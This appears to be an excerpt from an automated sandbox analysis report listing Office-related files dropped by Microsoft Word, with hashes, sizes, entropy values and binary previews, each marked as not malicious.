                                                                                                                                                                                                                                                                SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1463634
                                                                                                                                                                                                                                                                Entropy (8bit):7.898382456989258
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                                                                                                                                MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                                                                                                                                SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                                                                                                                                SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                                                                                                                                SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2218943
                                                                                                                                                                                                                                                                Entropy (8bit):7.942378408801199
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                                                                                                                                MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                                                                                                                                SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                                                                                                                                SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                                                                                                                                SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1750795
                                                                                                                                                                                                                                                                Entropy (8bit):7.892395931401988
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                                                                                                                                MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                                                                                                                                SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                                                                                                                                SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                                                                                                                                SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2924237
                                                                                                                                                                                                                                                                Entropy (8bit):7.970803022812704
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                                                                                                                                MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                                                                                                                                SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                                                                                                                                SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                                                                                                                                SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2357051
                                                                                                                                                                                                                                                                Entropy (8bit):7.929430745829162
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                                                                                                                                MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                                                                                                                                SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                                                                                                                                SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                                                                                                                                SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3611324
                                                                                                                                                                                                                                                                Entropy (8bit):7.965784120725206
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                                                                                                                                MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                                                                                                                                SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                                                                                                                                SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                                                                                                                                SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1091485
                                                                                                                                                                                                                                                                Entropy (8bit):7.906659368807194
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                                                                                                                                MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                                                                                                                                SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                                                                                                                                SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                                                                                                                                SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5783
                                                                                                                                                                                                                                                                Entropy (8bit):7.88616857639663
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                                                                                                                                MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                                                                                                                                SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                                                                                                                                SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                                                                                                                                SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4026
                                                                                                                                                                                                                                                                Entropy (8bit):7.809492693601857
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                                                                                                                                MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                                                                                                                                SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                                                                                                                                SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                                                                                                                                SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4243
                                                                                                                                                                                                                                                                Entropy (8bit):7.824383764848892
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                                                                                                                                                MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                                                                                                                                SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                                                                                                                                SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                                                                                                                                SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16806
                                                                                                                                                                                                                                                                Entropy (8bit):7.9519793977093505
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                                                                                                                                MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                                                                                                                                SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                                                                                                                                SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                                                                                                                                SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11380
                                                                                                                                                                                                                                                                Entropy (8bit):7.891971054886943
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                                                                                                                                MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                                                                                                                                SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                                                                                                                                SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                                                                                                                                SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6024
                                                                                                                                                                                                                                                                Entropy (8bit):7.886254023824049
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                                                                                                                                MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
